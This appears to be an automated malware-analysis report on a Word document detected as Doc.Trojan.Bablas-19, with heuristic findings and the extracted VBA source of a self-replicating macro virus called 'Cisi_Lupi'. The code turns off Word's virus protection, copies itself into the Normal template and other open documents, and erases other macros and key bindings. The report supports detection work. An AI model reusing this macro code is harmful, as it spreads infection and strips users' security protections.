MALICIOUS
204
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains legacy WordBasic macro virus markers and VBA macros, including AutoOpen and Document_Open, indicating malicious intent. The script attempts to disable security features and modify application settings, consistent with a macro-based threat. The ClamAV detection as 'Doc.Trojan.Bablas-19' further supports its malicious nature.
Heuristics 7
-
ClamAV: Doc.Trojan.Bablas-19 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Bablas-19
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
"Private Sub Document_Open()" + vbCrLf + _ -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6498 bytes |
SHA-256: 26d03ec462354483eeadddd384ef84cd991f1a6b169af2583913ad67c66f4a47 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Cisi_Lupi v1.10.000
Attribute VB_Name = "Cisi_Lupi"
'Program kecil ini adalah virus,
'tetapi BUKAN yang akan merusak komputer
'anda, tapi, daripada M$Word ada kena virus
'lain yang ganas, maka lebih baik saya handle
'
'Hormat Saya,
'Syarif Lumintarjo
'<syarifl@bigfoot.com>'
Const DEBUG_MODE = False
Const virName = "Cisi_Lupi"
Function virVersion() As String
virVersion = "1.10.000"
End Function
Sub ShowMessage()
MsgBox "Thank's for Not Deleting Cisi_Lupi", vbOKOnly
End Sub
Sub CL_OpenSecurity()
Options.SaveNormalPrompt = False
Options.VirusProtection = False
Options.SavePropertiesPrompt = False
End Sub
'Sub ToolsMacro()
'Application.VBE.MainWindow.Visible = True
'End Sub
'Sub ViewVbCode()
'ToolsMacro
'End Sub
'Sub FileTemplates()
'ToolsMacro
'End Sub
'Sub HelpAbout()
'End Sub
Sub ToolsOptions()
Options.SaveNormalPrompt = True
Options.SavePropertiesPrompt = True
Options.VirusProtection = True
Dialogs(wdDialogToolsOptions).Show
CL_OpenSecurity
End Sub
Sub ChangeCap()
On Error Resume Next
Application.Caption = "Micro$oft Word"
ActiveWindow.Caption = ActiveDocument.Name
End Sub
Sub RestoreCap()
On Error Resume Next
Application.Caption = "Bappebti Microsoft Word"
ActiveWindow.Caption = ActiveDocument.Name
End Sub
Sub CL_ResetSettings()
KeyBindings.ClearAll
On Error Resume Next
For Each Obj In CommandBars
Obj.reset
Next Obj
Options.CheckGrammarAsYouType = False
Options.CheckSpellingAsYouType = False
Options.CheckGrammarWithSpelling = False
Options.DefaultFilePath(wdUserTemplatesPath) = "C:\Program Files\Microsoft Office\Templates"
End Sub
Sub CL_ThisDocumentWriter(pkg)
Set cm = pkg.VBProject.VBComponents(1).CodeModule
s = "'Cisi_Lupi" + vbCrLf + _
"Private Sub Document_Close()" + vbCrLf + _
"TD_DocClose" + vbCrLf + _
"End Sub" + vbCrLf + _
"Private Sub Document_New()" + vbCrLf + _
"TD_DocNew" + vbCrLf + _
"End Sub" + vbCrLf + _
"Private Sub Document_Open()" + vbCrLf + _
"TD_DocOpen" + vbCrLf + _
"End Sub"
cm.AddFromString "'Cisi_Lupi v" + virVersion + vbCrLf
End Sub
Function CL_ClearComps(Direction) As Boolean
Select Case Direction
Case 1: Set Package = Application.NormalTemplate
Case 2: Set Package = Application.ActiveDocument
Case Else
Exit Function
End Select
Set Comps = Package.VBProject.VBComponents
Comps(1).CodeModule.DeleteLines 1, Comps(1).CodeModule.CountOfLines
IsOk = False
For Each Obj In Comps
If Obj.Name = virName Then IsOk = True
If Obj.Name = "ThisDocument" Then CL_ThisDocumentWriter Package
If Obj.Name <> virName And Obj.Name <> "ThisDocument" Then
Application.OrganizerDelete _
Source:=Package.FullName, _
Name:=Obj.Name, _
Object:=wdOrganizerObjectProjectItems
End If
Next Obj
CL_ClearComps = IsOk
End Function
Sub CL_OrgCopy(CompName, Direction)
On Error Resume Next
Select Case Direction
Case 1 'NormalTemplate to ActiveDocument
If DEBUG_MODE Then MsgBox NormalTemplate.FullName + " >> " + ActiveDocument.FullName
Application.OrganizerCopy _
Source:=NormalTemplate.FullName, _
Destination:=ActiveDocument.FullName, _
Name:=CompName, _
Object:=wdOrganizerObjectProjectItems
Case 2 'ActiveDocument to NormalTemplate
If DEBUG_MODE Then MsgBox ActiveDocument.FullName + " >> " + NormalTemplate.FullName
Application.OrganizerCopy _
Source:=ActiveDocument.FullName, _
Destination:=NormalTemplate.FullName, _
Name:=CompName, _
Object:=wdOrganizerObjectProjectItems
End Select
End Sub
Sub TemClearComponents()
IsOk = CL_ClearComps(1)
If Not IsOk Then CL_OrgCopy virName, 2
CL_ResetSettings
End Sub
Sub DocClearComponents()
IsOk = CL_ClearComps(2)
If Not IsOk Then CL_OrgCopy virName, 1
CL_ResetSettings
End Sub
Sub AutoExit()
If DEBUG_MODE Then MsgBox "AutoExit()"
ShowMessage
Application.Quit
End Sub
Sub FileOpen()
If DEBUG_MODE Then MsgBox "FileOpen()"
ChangeCap
WordBasic.DisableAutoMacros True
On Error Resume Next
If Dialogs(wdDialogFileOpen).Show <> 0 Then
DocClearComponents
ActiveDocument.Save
End If
RestoreCap
WordBasic.DisableAutoMacros False
End Sub
Sub AutoOpen()
If DEBUG_MODE Then MsgBox "AutoOpen()"
CL_OpenSecurity
ChangeCap
TemClearComponents
On Error Resume Next
NormalTemplate.Save
RestoreCap
End Sub
Sub AutoClose()
If DEBUG_MODE Then MsgBox "AutoClose()"
DocClearComponents
ActiveWindow.Close
End Sub
Sub FileClose()
If DEBUG_MODE Then MsgBox "FileClose()"
AutoClose
End Sub
Sub FileSave()
If DEBUG_MODE Then MsgBox "FileSave()"
If ActiveDocument.Saved = False Then
DocClearComponents
TemClearComponents
On Error Resume Next
ActiveDocument.Save
ActiveDocument.Saved = True
End If
End Sub
Sub AutoExec()
If DEBUG_MODE Then MsgBox "AutoExec()"
WordBasic.DisableAutoMacros True
CL_OpenSecurity
Application.OnTime Now + TimeValue("00:00:07"), "Normal." + virName + ".Demolish"
End Sub
Sub TD_DocOpen()
MsgBox "TD_DocOpen"
End Sub
Sub TD_DocClose()
MsgBox "TD_DocClose"
End Sub
Sub TD_DocNew()
MsgBox "TD_DocNew"
End Sub
Sub Demolish()
On Error Resume Next
C = Documents.Count
If C <> 0 Then
Normal.Cisi_Lupi.DocClearComponents
WordBasic.DisableAutoMacros False
If ActiveDocument.Name <> "Document1" Then ActiveDocument.Save
Else
Application.OnTime Now + TimeValue("00:00:07"), "Normal." + virName + ".Demolish"
End If
End Sub
Function CL_FindVBComponent(vbp, ComponentName) As Integer
isFound = False
i = 1
For Each Obj In vbp.VBComponents
isFound = (Obj.Name = ComponentName)
If isFound Then Exit For
i = i + 1
Next Obj
If isFound Then CL_FindVBComponent = i Else CL_FindVBComponent = -1
End Function
Function CL_GetVersion(vbc) As Integer
s = vbc.CodeModule.Lines(1, 1)
If s <> "" Then s = Right(s, Len(s) - 1)
CL_GetVersion = Val(s)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.